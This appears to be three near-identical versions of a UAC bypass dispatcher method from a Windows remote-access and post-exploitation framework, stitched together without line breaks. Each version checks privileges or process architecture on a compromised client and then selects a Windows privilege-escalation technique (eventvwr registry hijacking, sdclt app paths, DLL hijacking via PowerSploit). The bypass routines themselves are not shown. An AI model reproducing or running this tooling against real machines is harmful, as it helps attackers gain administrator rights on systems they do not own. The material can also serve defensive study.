def run(self, args): if self.client.desc['proc_arch'] == '32bit' and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture(): self.error("You are using a x86 process while the os architecture is x64") self.error("Migrate to a x64 process before trying to bypass UAC") elif args.method == "eventvwr" or (self.client.desc['release'] == '10' and args.method == None): self.success("Trying to bypass UAC with Eventvwr method (UAC Bypass using eventvwr.exe and Registry Hijacking), wind7-10 targets...") bypassUasModule = bypassuac(self, rootPupyPath=ROOT) bypassUasModule.bypassuac_through_EventVwrBypass() else: self.success("Trying to bypass UAC with sysprep method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...") bypassUasModule = bypassuac(self, rootPupyPath=ROOT) bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
def run(self, args): # check if a UAC Bypass can be done if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access(): self.error('Your are not on the local administrator group.') return dll_hijacking = False registry_hijacking = False bypassUasModule = bypassuac(self, rootPupyPath=ROOT) # choose methods depending on the OS Version if not args.method: if self.client.desc['release'] == '10': registry_hijacking = True else: dll_hijacking = True elif args.method == "eventvwr": registry_hijacking = True else: dll_hijacking = True if registry_hijacking: self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...") bypassUasModule.bypassuac_through_EventVwrBypass() elif dll_hijacking: # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012) self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...") bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
def run(self, args): # check if a UAC Bypass can be done if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access(): self.error('Your are not on the local administrator group.') return appPathsMethod = False eventvwrMethod = False dllhijackingMethod = False bypassUasModule = bypassuac(self, rootPupyPath=ROOT) # choose methods depending on the OS Version if not args.method: if self.client.desc['release'] == '10': appPathsMethod = True else: dllhijackingMethod = True elif args.method == "appPaths": appPathsMethod = True elif args.method == "eventvwr": eventvwrMethod = True elif args.method == "dll_hijacking": dllhijackingMethod = True if appPathsMethod: self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...") bypassUasModule.bypassuac_through_appPaths() if eventvwrMethod: self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...") bypassUasModule.bypassuac_through_eventVwrBypass() if dllhijackingMethod: # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012) self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...") bypassUasModule.bypassuac_through_powerSploitBypassUAC()